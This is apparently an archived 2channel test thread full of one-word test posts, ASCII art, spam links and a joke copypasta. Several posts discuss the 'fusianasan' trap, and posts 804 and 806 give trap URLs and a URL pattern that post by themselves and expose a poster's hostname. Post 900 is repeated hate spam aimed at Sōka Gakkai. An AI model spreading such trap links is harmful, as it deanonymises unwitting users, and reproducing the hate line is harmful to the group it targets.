神話から歴史へと人間が神から一人歩きする激動の時代。
黄帝亡き後には蛮愚が跳梁し、獣も人も区別なく地獄を味わったという。
そんな中、黄帝の教えを頑なに守ろうとする若者がいた。
唖那という黄帝死後に民を苦しめた一族の者だ。
ある日彼は町娘に部下が暴行を働くのを咎め刑したところ、その両親にこう詰られた。
「例えあなたが黄帝の血をひいたとしてもその教えを守ろうともあなたは鬼の一族、唖那の人間だ」
そして町人の正論に力なく項垂れ殿に帰った彼を待っていたのは親類達の謀略だった。
彼は気付くや否やすぐさま一族の者を親しかった従兄弟と共に皆殺した。
そして部下に黄帝に仕えた唖那氏再興を問われた時にこう答えた。
「唖那は(我が)氏にあらず(我は)ただ散るのみ」(責任を取って家を潰す)
この若者の偉業を人々は長く語り継ぎ、今日(こんにち)の2ちゃんねるにもそれは残っている。
補足・一説によれば鳥の羽から作った身分証明書(鳥符)を廃止したとも、
すべては彼に付き従った従兄弟の策略で氏を表す鳥符を捨てざる終えなかったとも言われてる
民明書房刊「鳥符〜伝説から歴史・そこに横たわる罠〜」より
関連スレ「民明書房刊 DNAに刻まれた中國のガイドライン」

696 :
test

697 :
aaaa

698 :
test

699 :
test

700 :
test

701 :
test

702 :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

703 :
22
23
224
25
26
27
28
29
30
31

704 :
test

705 :
test

706 :
おいおい、おまいらこれ見たか?
http://www2.sala.or.jp/~uuu/security/2chc1.html
Cookie設定の脆弱性
●概要
 2ch掲示板投稿時に、いつの間にか気づかぬうちに勝手に名前がfusianasanになります。

707 :
>>706
Mozillaは無問題
Operaは設定で回避できる
IE6もSP2になれば設定で回避できる

708 :
test

709 :
fusianasan

710 :
a

711 :
http://hobby6.2ch.net/test/read.cgi/rail/1097480051/9
の通りにすると、fusianasan同等の効果があったなんて知りませんでした。

712 :
実験

713 :
fusianasan

714 :
詐欺サイト発見。
任意の画像をクリックしてみてください。
http://73333.net/top.html

715 :
ti

716 :
テスート

717 :
te

718 :
tesu

719 :
te

720 :
テスト

721 :
tes

722 :
tes

723 :
てs

724 :
www2j.biglobe.ne.jp/~tatuta/cgi-bin/paint/15.gif

725 :


726 :
test

727 :
あれ

728 :
aq

729 :
お、Blユーザ見っけ

730 :
fusiana.net

731 :
♪ペーペポ ペーポポペー
____ ペーペポ ペーペポ ペペポポペー♪
|屋上遊園|
 ̄ ̄ ̄ ̄     ('A`)
        ヘI ノ( ノ )
       ('ω` ) <  )〜
        U U U U

732 :
エイッ!

733 :
あか

734 :
fusianaaaa

735 :
aaaaaaaaa

736 :
昔はよく引っかかったもの

737 :
accesplus.jp/staff

738 :
accessplus.jp/staff

739 :
tes

740 :
*

741 :
てすと

742 :
へー

743 :
てs

744 :
fusiana‎san

745 :


746 :
↓騙された毎日の記者
http://news12.2ch.net/test/read.cgi/news/1086322529/l50

747 :
テス

748 :
GET

749 :
ほぉ‥

750 :


751 :


752 :
てす

753 :
>>4
並んでないよ
おまえ遅れてるね…。
低学歴Rよ

754 :
こうですかわかりません

755 :
【2004年アメリカ単独ライブでの『READYSTEADYGO』】
http://www.youtube.com/watch?v=wdvK3axd0uo&search=larc%7Een%7Eciel%20%20READY%20STEADY%20GO
【2005年アジアツアーでの『Killing Me』と『HEAVEN'S DRIVE 』】
http://www.youtube.com/watch?v=lTmQ4IIXJ1g&search=larc%7Een%7Eciel%20%20Killing%20Me%20
【2005年アジアツアーでの『Driver's High』と『LOST HEAVEN』】
http://www.youtube.com/watch?v=64x6LLdWV5I&search=larc%7Een%7Eciel%20%E3%80%80ASIALIVE
【2005年アジアツアーでのラルクアンシエルメドレー】
http://www.youtube.com/watch?v=BBs0QTixVUw&search=larc%7Een%7Eciel%20%E3%80%80ASIALIVE
【2005年アジアツアーでの『snowdrop』『winterfall』『forbidden lovver』
http://www.youtube.com/watch?v=C35EgbebunY&search=larc%7Een%7Eciel%20%20LIVE
【2005年アジアツアー『Getoutfromtheshell』『Newworld』『自由への招待』】
http://www.youtube.com/watch?v=85ImSI4qeJ0
【2005年アジアツアーでの『虹』】
http://www.youtube.com/watch?v=wuy2lb0WJc4&search=larc%7Een%7Eciel%20%E3%80%80ASIALIVE
【2004年アメリカ単独ライブでの『STAYAWAY』】
http://www.youtube.com/watch?v=Bv2K4UKaXi4&search=larc%7Een%7Eciel%20%20LIVE
【2004年アメリカ単独ライブでの『HEVEN'S DRIVE』】
http://www.youtube.com/watch?v=tdPq1OPCUWI&search=larc%7Een%7Eciel%20%20LIVE
【2004年アメリカ単独ライブでの『driver's high』】
http://www.youtube.com/watch?v=kF2wMw7WWyE&search=l%27arc
【2004年アメリカ単独ライブでの『花葬』】
http://www.youtube.com/watch?v=ltoWHk5FX-c&search=l%27arc%20USA
【おまけ★HYDEのソロ活動台湾での『evergreen』『shallowsleep』】
http://www.youtube.com/watch?v=qMMSealOPSY&search=larc%7Een%7Eciel%20%20LIVE
【おまけ★2000年経済大国日本での壮絶、壮烈、衝撃ライブ『いばらの涙』】
http://www.youtube.com/watch?v=p_7YRAz6XGc&search=larc%7Een%7Eciel%20%20ibara

756 :
わかってる

757 :
sage

758 :
もしも引っかかったらどうすればいいの?
気になる。

759 :
ふしあなさん[fusianasan]
 , r_‐7\:.:.:.:.:ハ:.:.:.|!:.|ヽ:ヽ7ヘ      
 {__く_ヽ_ヽ:/  |:.:.ハハ:.|:./フ′    
 ヽ7´::: |:.:.7 二´|:/`_ー|:.ト:.|      
  < ̄|:./   /| ` !:!:.l|        
  /:.:`..|/     l  |.|:.|′    
  /:.:.:./:.|      ´  j/:.|      
. /:.:.:.:.:.:. | ヽ  ´ ̄ /:.:.:.|   
/:.:.:.く  ̄{  \__..イー-ァ::.|   {:::::ヽ、  
:.:,ィ< \ヽ __  __ノ /、:.:.|   j-Cィヽ
´== ´亘 |!〉ーv-〈|! /_\ー-/::::.|::_Cヘ、
:::::::::::.|:::::.|! 二_}.二|!:::亘 `=ヽ' イ´ヽ::_Cヘ、
==つくハ ィ┴、 |!:.|::::::::::::::ハ. |  |::_C::ヘ、
本名 不死 孔明
年齢 18歳
性別 ハートフルゲイ
身長 181.3cm
体重 65.7kg
口癖 そんなことよりさぁ、ビークル語らね?
   beat crusaders最高!!
属性 マターリ系
必殺技 R首陥没ビーム
まわりからの評判 納豆のねばりを無くせる
つけたし スターウォーズとスタートレック、どちらが好き?と言われれば
     どちらかといえばスタトレの方が好き

http://ex16.2ch.net/test/read.cgi/news4vip/1154828379/
”ふしあなさん ってどんなヤツかそろそろ決めようぜ”

760 :
・・・

761 :


762 :
t

763 :
引っかかった!

764 :
sage

765 :
なかやたはなかやた

766 :
高三兄815がファーストキスを奪った高一妹に告白


http://game9.2ch.net/test/read.cgi/gal/1155913445/

767 :
test

768 :
test

769 :
てすと

770 :
テスト

771 :
uhe

772 :
てすと

773 :
a

774 :
テス

775 :
>>1
モ板(狼)ではいつでもfusianasanですぞ

776 :
*

777 :
>>770
ほれ
Domain Information: [ドメイン情報]
a. [ドメイン名] KATCH.NE.JP
b. [ねっとわーくさーびすめい] きゃっちねっと
c. [ネットワークサービス名] KATCH-NET
d. [Network Service Name] KATCH-NET
k. [組織種別] ネットワークサービス
l. [Organization Type] Network Service
m. [登録担当者] YO7133JP
n. [技術連絡担当者] DA744JP
n. [技術連絡担当者] MO6056JP
p. [ネームサーバ] ns.katch.ne.jp
p. [ネームサーバ] ns2.katch.ne.jp
[状態] Connected (2007/11/30)
[登録年月日] 1997/11/27
[接続年月日] 1997/12/05
[最終更新] 2006/12/01 01:05:52 (JST)

778 :
t

779 :
t

780 :
t

781 :
VIPからきますた

782 :
http://www2.sala.or.jp/~uuu/security/2chc1.html テスト

783 :
テスト

784 :
テスト

785 :
test

786 :
http://www2.leverage.jp/start/
testtest

787 :
test

788 :
てすお

789 :
最近
強制fusianaできるリンクとかないんですね

790 :
ちょいてす

791 :


792 :


793 :
書込もうとしてもfusianasanトラップの警告が出たら
書込みできないね。どうしたら良い?

794 :
fusianasanトラップは何が目的なのですか?
回避方法は?

795 :
名前欄に出る人
出ない人
両方いるのは、なぜですか?

796 :
test

797 :
てすてす

798 :
実験用。?だ。

799 :
芋てす

800 :
てすとん

801 :
てす

802 :
ん?

803 :
fusianasanには何か問題があるのですか?

804 :
ここを踏むと勝手にfusianasanしてくれるらしい
http://pc11.2ch.net.nat.homeunix.org:65082/post.pl?b=sec&t=1008581128

805 :
新しいの来ました。

806 :
ちょっ、Enterで書き込みになってたorz
ttp://pc11.2ch.net.news4fenrir.com/test/read.cgi/sec/1008581128/
この用に、こんな形式
ttp://板URLの一部.net.news4fenrir.com/test/read.cgi/板名/スレキー/
で、開くだけで自動でフシアナ&pooで書き込むやつが出回ってるので注意。
大抵短縮URLになってる

807 :
fusianasan

808 :
fusianasan

809 :
tes

810 :
うは

811 :
書き込みを消す方法ってしってますか?
1 名前: 以下、名無しにかわりましてVIPがお送りします [sage] 投稿日: 2009/04/15(水) 22:11:33.41 ID:IGsE7bgE0
教えてください><
2 名前: 以下、名無しにかわりましてVIPがお送りします 投稿日: 2009/04/15(水) 22:12:26.97 ID:VJ5OKWrU0
名前欄に 「fusianasan」と入れて消したいレスのアドレスを張る
7 名前: p1212-ipbfp502kyoto.kyoto.ocn.ne.jp 投稿日: 2009/04/15(水) 22:14:30.62 ID:IGsE7bgE0
http://takeshima.2ch.net/test/read.cgi/news4vip/1239800692/

812 :
テス

813 :


814 :
山崎渉

815 :
>>804
これもう使えないのか

816 :
新しいトラップまだかお

817 :
おおお

818 :
.

819 :
gomi

820 :
test

821 :
てす

822 :
あああ

823 :
     __
     /    ヽ _____
    l    ´ ̄      `ヽ、_
   _ゝ                   `ヽ、
   -ニ/       ⌒ ト、    , -、   l
     l     , ‐ メ、}    ,L_   _ノ
...     l   ,∠-‐' r- L -∠´ヽゝ__フ
     v‐l |      |  l  l  l  |
    (  ヽ|⊂⊃  `ー'  ヽノ   l
    `ー、          ⊂⊃ヽ   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       ゝ、_     r-,      ノ  <  ♪ ヒャッハーッ!フルチンで過ごすのが一番だぜ!
           ァェ-_ レ__ -‐     \
        /          |
       (_⌒) ・    ・ ||
         l⌒ヽ     _ノ |
         |  r `(;;U;)   )__)
         (_ノ  ̄ / /
              (_ノ

824 :
カラスは西に向かった
カラスは西に向かった

825 :


826 :
てす

827 :
生存中
fusianasan
山崎渉

828 :
テスト

829 :
http://www.fusianasan.2ch.net/

830 :
テス

831 :
テスト

832 :
テスト

833 :
テスト

834 :
テスト

835 :
test

836 :
テスト

837 :
test

838 :
強制節穴の懲罰を喰らったでござる

839 :
test

840 :
 

841 :
test

842 :
tes

843 :
てす

844 :
test

845 :
てす

846 :
fusianasanと名前欄に打てば勝手に住所とかが表示されると聞いたんですが

847 :
guest guest

848 :
fusoana

849 :
t

850 :
>>823
板違いじゃねーの?

851 :
ふしあなテス

852 :
Test

853 :
Test

854 :
Test

855 :
愛し合っています
お互いが良きパートナーになれるように応援してねo(^▽^)o
http://beebee2see.appspot.com/i/azuY3tWfBAw.jpg

856 :
名前おかしくしてテスト

857 :
だめだった

858 :
にや

859 :
かな

860 :
test

861 :
test

862 :
test

863 :
テス

864 :
あはん?

865 :
てす

866 :


867 :


868 :
tesu

869 :


870 :
tes

871 :


872 :
test

873 :
テス

874 :
テス

875 :


876 :
test

877 :
test

878 :
test

879 :
てす

880 :
ad_min_chan

881 :
test

882 :
test

883 :
てs

884 :
おてす

885 :
あれ?俺引っかかってね?

886 :
てすつ

887 :
TEST

888 :


889 :
ふしてす

890 :
もっかい!

891 :
fusites

892 :
引っ越したからどうなってるか

893 :
てすと

894 :
てす

895 :
てす

896 :


897 :
てす

898 :
テストですお

899 :
てすてす

900 :
ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね 
ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね

901 :
てす

902 :
test

903 :
test

904 :
シコシコ5回目。

905 :2012/10/31
テス
TOP カテ一覧 スレ一覧 2ch元 削除依頼
ウイルスバスターくん?マカフィーちゃん?ノートンさん?誰が好き? (204)
ウイルスバスター・ウイルスセキュリティZERO・キングソフトどれがいい? (520)
◇Avira Internet Security 2012 Part.3◇ (588)
フリーのアンチウイルスソフト Part29 (307)
ウイルスバスターって明らかに欠陥品じゃね? 2 (955)
ネットでストーカー被害に合って困っています。 (274)
--log9.info------------------
【本音と】テディベアの裏事情3【建前】 (372)
何故うさぎのぬいぐるみはかわいいのか? (756)
【ふわふわ】しろたん7匹目(=・ω・=)【ねむねむ】 (609)
(@∀@)プチBlythe Part53(∪∀∪) (628)
球体関節人形製作における情報交換 PART11 (280)
◇◆お人形東北総合スレッド2◆◇牛タン他 (406)
【こんにちは】LaTi Doll 8体目【ラティーです】 (915)
【三国志】川本喜八郎【平家物語】 (230)
【Fashion Royalty】Integrity Toys 14【Jason Wu】 (465)
【ばら】バラ統合スレ【薔薇】Part64 (636)
【BOINC】命の青豆育てませんか●16株目【がん】 (573)
文末に「全裸で。」を付け加えるスレ in 園芸板 (991)
【三つ葉】クローバー【四つ葉】 (273)
【リトープス】メセン総合スレ11【コノフィツム】 (705)
●●ブルーベリー大好き●● part47 (206)
◆◆園芸初心者質問スレッド PART71◆◆ (878)
--log55.com------------------
PCゲー ゼビウス
複数PCにExcelをインストールできない
◆インターネットディスク被害者友の会◆
DELLファイルって・・・
ユードラはどうよ???
【栄光?】一太郎の歴史【暗黒?】
OfficeXPが売れなくて収益減少。
壊れたファイルを復元するソフトを教えてください。